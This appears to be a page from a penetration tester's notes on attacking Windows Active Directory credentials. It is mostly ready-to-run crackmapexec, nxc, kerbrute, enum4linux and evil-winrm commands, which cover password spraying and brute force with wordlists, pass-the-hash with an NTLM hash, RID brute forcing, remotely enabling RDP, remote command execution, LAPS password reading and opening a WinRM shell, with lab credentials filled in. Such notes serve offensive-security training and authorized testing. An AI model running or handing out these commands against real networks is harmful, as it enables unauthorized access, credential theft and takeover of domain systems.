Credentials

SMB

crackmapexec smb targetip (port 135, 139 or 445)

crackmapexec

crackmapexec smb <target_ip> -u <username> -p <password>
crackmapexec smb <target_ip> -u <username> -p <password> --shares
crackmapexec smb 192.168.1.1-100 <range IPs> -u <username> -p <password> --shares
crackmapexec smb <target_ip> -u userslist -p passwordlist --shares

crackmapexec smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

# enable rdp
crackmapexec smb IP -u user -p pass -M rdp -o ACTION=enable
#spider_plus is a carackmapexec module used in the smb section to copy all files paths into a json file
crackmapexec smb <target_ip> -u <username> -p <password> -M spider_plus
#to show content 
crackmapexec smb 192.168.1.50 -d wargrey.mon -u Administrator -p h3ckt0r -x “more filepath”

crackmapexec smb 10.10.144.122 -u users -p /usr/share/wordlists/rockyou.txt --continue

LDAP

#Testing if account exist without kerberos protocol
crackmapexec ldap 192.168.1.0/24 -u users.txt -p '' -k
#Testing credentials
crackmapexec ldap 192.168.1.0/24 -u user -p password
crackmapexec ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
#Identify Trust Relationships And Direction
crackmapexec ldap <ip> -u user -p pass -M enum_trusts

WINRAM or Use nxc

#Identify Trust Relationships And Direction
crackmapexec ldap <ip> -u user -p pass -M enum_trusts
#Password spraying (without brute force)
crackmapexec winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

#Testing credentials
crackmapexec winrm 192.168.1.0/24 -u user -p password

#If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection
crackmapexec winrm 192.168.1.0/24 -u user -p password -d DOMAIN
#Execute Command using WinRM
crackmapexec winrm 192.168.255.131 -u user -p 'password' -X whoami
#if we meet server 2012 or less, maybe the server has a local administrator with the password you can use  --laps refer to  local administrator password solution
crackmapexec winrm <ip> -u user-can-read-laps -p pass --laps

nxc winrm 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
nxc smb 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
nxc smb  10.10.205.80 -u ' guest' -p '' --rid-brute | grep 'SidTypeUser'

Nmap

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>

if we don't join in Domain >> use nslookup

nslookup

nslookup <ip you want> <ip DNS>
#we can use this script to extract data as Like Name (computer name or Client) and (ip)
for /L %i in (1,1,255) do @nslookup 192.168.1.%i <ip DNS> 2>null | find "Name" && echo 192.168.1.%i

enum4linux

enum4linux -a -u "user" -p "password" <DC IP>

./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
./kerbrute_linux_amd64 -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

smbmap

Find Domain Controller IP

nslookup -type=SRV _ldap._tcp.dc._msdcs.deathstar.rfs

evil-Winrm

evil-winrm -u j.rock@services.local -p Serviceworks1 --ip 10.10.175.105

PreviousBloodHound Enumeration NextCredential Dumping

Last updated 1 year ago